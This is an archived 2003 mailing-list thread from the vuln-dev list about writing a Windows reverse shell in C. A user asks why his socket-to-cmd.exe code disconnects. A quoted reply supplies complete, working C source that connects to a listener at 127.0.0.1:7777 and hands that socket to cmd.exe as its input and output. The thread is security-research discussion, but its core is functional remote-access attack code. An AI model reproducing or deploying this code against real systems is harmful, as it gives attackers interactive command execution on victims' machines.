Re[2]: Windows reverse Shell

From: Adik (netninjaat_private)
Date: Wed Feb 05 2003 - 01:03:03 PST

  • Next message: Knud Erik Højgaard: "Fw: f-prot antivirus useless buffer overflow" 

    Hello 3APA3A,

Thnx for ur code. The one i wrote is absolutely the same without bind.
Infact we dont need "bind", though David Litchfield mentions it in his
Blackhat talk. SO anyway did u try compiling ur code? if not u should
try, coz i c the same results,ie i get connection on my netcat, but then
it suddenly disconnects. no command prompt.

Tuesday, February 4, 2003, 10:34:56 PM, you wrote:

3> Return-Path: <3APA3Aat_private>
3> X-Sieve: cmu-sieve 2.0
3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34])
3>         by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456
3>         for <netninjaat_private>; Tue, 4 Feb 2003 21:31:14 +0500 (KGT)
3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2])
3>         by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643
3>         for <netninjaat_private>; Tue, 4 Feb 2003 22:55:39 +0500
3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40])
3>         by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518;
3>         Tue, 4 Feb 2003 19:34:56 +0300 (MSK)
3>         (envelope-from 3APA3Aat_private)
3> Date: Tue, 4 Feb 2003 19:34:56 +0300
3> From: 3APA3A <3APA3Aat_private>
3> X-Mailer: The Bat! (v1.61)
3> Reply-To: 3APA3A <3APA3Aat_private>
3> Organization: http://www.security.nnov.ru
3> X-Priority: 3 (Normal)
3> Message-ID: <1939904491.20030204193456at_private>
3> To: SecFocus <netninjaat_private>
3> CC: vuln-devat_private
3> Subject: Re: Windows reverse Shell
3> In-Reply-To: <1028124981.20030204013745at_private>
3> References: <1028124981.20030204013745at_private>
3> MIME-Version: 1.0
3> Content-Type: text/plain; charset=Windows-1251
3> Content-Transfer-Encoding: 8bit

3> Dear NetNinja,

3> Code below successfully brings reverse shell to 127.0.0.1:7777.

3> #include <windows.h>
3> #include <winsock2.h>
3> #include <stdio.h>

3> int main(int argc, char* argv[]){
3>  WSADATA wd;
3>  HANDLE h;
3>  SOCKET sock;
3>  STARTUPINFO si;
3>  PROCESS_INFORMATION  pi;
3>  struct sockaddr_in sin;
3>  int size = sizeof(sin);



3>  memset(&sin, 0, sizeof(sin));
3>  memset(&si, 0, sizeof(si));
3>  WSAStartup(MAKEWORD( 1, 1 ), &wd);
3>  sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
3>  sin.sin_family = AF_INET;
3>  bind(sock, (struct sockaddr*)&sin, size);
3>  sin.sin_port = htons(7777);
3>  sin.sin_addr.s_addr = inet_addr("127.0.0.1");
3>  connect(sock, (struct sockaddr*)&sin, size);
3>  si.cb = sizeof(si);
3>  si.dwFlags = STARTF_USESTDHANDLES;
3>  si.hStdInput = si.hStdOutput = si.hStdError = sock;
3>  CreateProcess(
3>         NULL,
3>         "cmd.exe",
3>         NULL,
3>         NULL,
3>         TRUE,
3>         0,
3>         0,
3>         NULL,
3>         &si,
3>         &pi
3>  );
3>  return 0;
3> }



3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:

N>> Hello guys,

N>> David Litchfield in his Blackhat talk, talked about using socket handle
N>> from WSASocket() and pass that handle as a parameter to stdin, stdout
N>> and stderr for CreateProcess function. By doin this way his reverse
N>> cmd shellcode becomes much smaller. I tried coding that reverse
N>> command shell in C, but couldnt get it to work. It simply connects to
N>> my listening netcat listener and then disconnects. David Litchfield
N>> used 4 functions to achieva that WSASocket, bind, connect and
N>> CreateProcess. A lil help would b appreciated on building this reverse
N>> cmd shell. thanx.
  






-- 
Best regards,
 Adik                            mailto:netninjaat_private

    This archive was generated by hypermail 2b30 : Wed Feb 05 2003 - 09:22:27 PST